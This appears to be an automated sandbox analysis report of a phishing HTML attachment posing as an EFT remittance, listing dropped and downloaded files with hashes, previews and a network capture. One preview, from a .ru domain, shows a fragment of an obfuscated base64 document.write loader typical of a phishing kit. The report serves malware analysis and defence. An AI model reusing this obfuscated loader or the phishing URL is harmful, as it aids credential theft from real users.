                                                                    SHA-256:0A29B321A652F11DD761231F6F5721B5CD668A4DFF55C1CA697DC78828D1982A
                                                                    SHA-512:08EC1816D4F0F7A10908AE53E90FFF7738FD86FA109A456F1F97AA06DD9E82479825D33F88DA7932FA122162FCD487CFE1DCC5FF936A2390B4B03FD81F23CDD6
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:L..................F.@.. ...$+.,..../../6R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y].....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y].....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y].....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y]............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yb............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........y........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:51:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2681
                                                                    Entropy (8bit):3.9851816738428454
                                                                    Encrypted:false
                                                                    SSDEEP:48:8P7duTK+NHqidAKZdA1hehBiZUk1W1qehjy+C:8Uvv9Dy
                                                                    MD5:DB6C68939E7B2D65B44CADADE2FEDDBA
                                                                    SHA1:173175465421E32D8F3EBF7BDC9DAB66CB63600D
                                                                    SHA-256:B47C4DDCB5DB0BB191F7A247FAD1B5C72933E62055FF5BFD58639C478E86E27D
                                                                    SHA-512:603A8B5752AF529095AD89BB481C7959A0ADC3DD391CB50669D2A94F157E5A376BBFB0F2EC78DB93916E7CB6FE9F7DA4C8A613AE93898343C57B00E7A3573B1D
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:L..................F.@.. ...$+.,....._./6R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y].....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y].....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y].....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y]............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yb............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........y........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:51:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2683
                                                                    Entropy (8bit):3.9950659529318187
                                                                    Encrypted:false
                                                                    SSDEEP:48:8zduTK+NHqidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbVy+yT+:8kvnT/TbxWOvTbVy7T
                                                                    MD5:439BBCDDDB5BB9E4A5320C0F11AB52DD
                                                                    SHA1:78DB4B2CCDA37E8C1ED034252693BB8DB171A5CB
                                                                    SHA-256:710E0EE565D5BFDD91C5A8FF6DD68E3F028F7BEE13733805C975A3B0A5328FF8
                                                                    SHA-512:2F41A663F15AB9D2BC57F81865C760B02FED23028335500674B8EB62B4866F424C64340B83AA3495E64847D481CCB716F8B5995BE44FD111CD3E58FEF53C2A86
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:L..................F.@.. ...$+.,.....*./6R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y].....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y].....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y].....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y]............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yb............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........y........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65451)
                                                                    Category:downloaded
                                                                    Size (bytes):89476
                                                                    Entropy (8bit):5.2896589255084425
                                                                    Encrypted:false
                                                                    SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                    MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                    SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                    SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                    SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    URL:https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
                                                                    Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65447)
                                                                    Category:downloaded
                                                                    Size (bytes):89501
                                                                    Entropy (8bit):5.289893677458563
                                                                    Encrypted:false
                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                    Malicious:false
                                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                    Category:downloaded
                                                                    Size (bytes):61
                                                                    Entropy (8bit):3.990210155325004
                                                                    Encrypted:false
                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                    Malicious:false
                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (47691)
                                                                    Category:dropped
                                                                    Size (bytes):47692
                                                                    Entropy (8bit):5.4016459163756165
                                                                    Encrypted:false
                                                                    SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                    MD5:9046FDD8B20F930F537279DEDE41E747
                                                                    SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                    SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                    SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                    Malicious:false
                                                                    Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):48316
                                                                    Entropy (8bit):5.6346993394709
                                                                    Encrypted:false
                                                                    SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                    Malicious:false
                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):61
                                                                    Entropy (8bit):3.990210155325004
                                                                    Encrypted:false
                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                    Malicious:false
                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65451)
                                                                    Category:dropped
                                                                    Size (bytes):89476
                                                                    Entropy (8bit):5.2896589255084425
                                                                    Encrypted:false
                                                                    SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                    MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                    SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                    SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                    SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                    Malicious:false
                                                                    Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):48316
                                                                    Entropy (8bit):5.6346993394709
                                                                    Encrypted:false
                                                                    SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                    Malicious:false
                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (47691)
                                                                    Category:downloaded
                                                                    Size (bytes):47692
                                                                    Entropy (8bit):5.4016459163756165
                                                                    Encrypted:false
                                                                    SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                    MD5:9046FDD8B20F930F537279DEDE41E747
                                                                    SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                    SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                    SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                    Malicious:false
                                                                    URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                    Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (7461), with CRLF line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):19908
                                                                    Entropy (8bit):5.885862262132424
                                                                    Encrypted:false
                                                                    SSDEEP:384:rnuGIb5ZoRi7AR7inuGIb5ZoRi7AR3lr/lrbE:8b5ZoRi72b5ZoRi7Mlr/lrA
                                                                    MD5:EF860CC5FFCDF90F80A46A2EACD6FDA0
                                                                    SHA1:03C31DFAF5B6CA3412F6DA9961767318BF7042BF
                                                                    SHA-256:C10B52FAC2857ACD610203393D0B7A26B6F389F489359EAB30F14D9D0DDF4566
                                                                    SHA-512:F451EA4FE4DF5346C370A7E4DB846D20CD4DAF47688AF1A2BB333176F1DB0AECA42EC815EBE4D7251F8A9C226103122C791A23288846136A8991C97B29988524
                                                                    Malicious:false
                                                                    URL:https://vae.venmink.ru/jK5I/
                                                                    Preview: Success is not in what you have, but who you are. -->..<script>../* Success is not built on success. It&#039;s built on failure. It&#039;s built on frustration. Sometimes it&#039;s built on catastrophe. */..if(atob("aHR0cHM6Ly92QUUudmVubWluay5ydS9qSzVJLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2Nhb
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65447)
                                                                    Category:dropped
                                                                    Size (bytes):89501
                                                                    Entropy (8bit):5.289893677458563
                                                                    Encrypted:false
                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                    Malicious:false
                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                    File type:HTML document, Unicode text, UTF-8 text, with very long lines (9412), with CRLF line terminators
                                                                    Entropy (8bit):4.671102535067367
                                                                    TrID:
                                                                    • Scalable Vector Graphics (18501/1) 31.09%
                                                                    • HyperText Markup Language (12001/1) 20.17%
                                                                    • HyperText Markup Language (12001/1) 20.17%
                                                                    • HyperText Markup Language (11001/1) 18.49%
                                                                    • HyperText Markup Language (6006/1) 10.09%
                                                                    File name:EFT Remittance_(Dmorris)CQDM.html
                                                                    File size:13'453 bytes
                                                                    MD5:c38303fde1bb4165b3bc15ac737876b5
                                                                    SHA1:076d4bcbf25e3579df8baf60f9ef77c468164e70
                                                                    SHA256:5da83915376f2f84a481b8460c42fb5af17c8dd16eee7c70a1998b631c68666a
                                                                    SHA512:679f74ae54aee93d99a15428ebb9bbf5203229c8aed1ec44ae0b475706360bdd2dcad8021c39deef25f8b8b626d609b2c7337308ccfc101b562db6c662fa1128
                                                                    SSDEEP:384:NHvBWQvVkAvazFFGse/wwlOfm/M+mv8bc7H46qI1FXwak14gtkBZtAyThkAAzWtv:N5WQS8azFFGse/wwl2m0+mv8bc7H46qa
                                                                    TLSH:125273F80781FCD4E329820A87843FA99E2F330625C14FA47D9A35495BED625F0FE995
                                                                    File Content Preview:<html>.. <head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <style>.. @font-face { font-family: system; font-style: normal; font-weight: 300; s
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 19, 2024 17:50:54.529335022 CET49675443192.168.2.523.1.237.91
                                                                    Dec 19, 2024 17:50:54.529336929 CET49674443192.168.2.523.1.237.91
                                                                    Dec 19, 2024 17:50:54.623070002 CET49673443192.168.2.523.1.237.91
                                                                    Dec 19, 2024 17:51:04.132836103 CET49674443192.168.2.523.1.237.91
                                                                    Dec 19, 2024 17:51:04.132855892 CET49675443192.168.2.523.1.237.91
                                                                    Dec 19, 2024 17:51:04.228524923 CET49673443192.168.2.523.1.237.91
                                                                    Dec 19, 2024 17:51:04.934031010 CET49714443192.168.2.5104.21.85.123
                                                                    Dec 19, 2024 17:51:04.934143066 CET44349714104.21.85.123192.168.2.5
                                                                    Dec 19, 2024 17:51:04.934257984 CET49714443192.168.2.5104.21.85.123
                                                                    Dec 19, 2024 17:51:04.934607983 CET49714443192.168.2.5104.21.85.123
                                                                    Dec 19, 2024 17:51:04.934644938 CET44349714104.21.85.123192.168.2.5
                                                                    Dec 19, 2024 17:51:05.632509947 CET49715443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:51:05.632556915 CET44349715172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:51:05.632641077 CET49715443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:51:05.633007050 CET49715443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:51:05.633029938 CET44349715172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:51:06.155553102 CET44349714104.21.85.123192.168.2.5
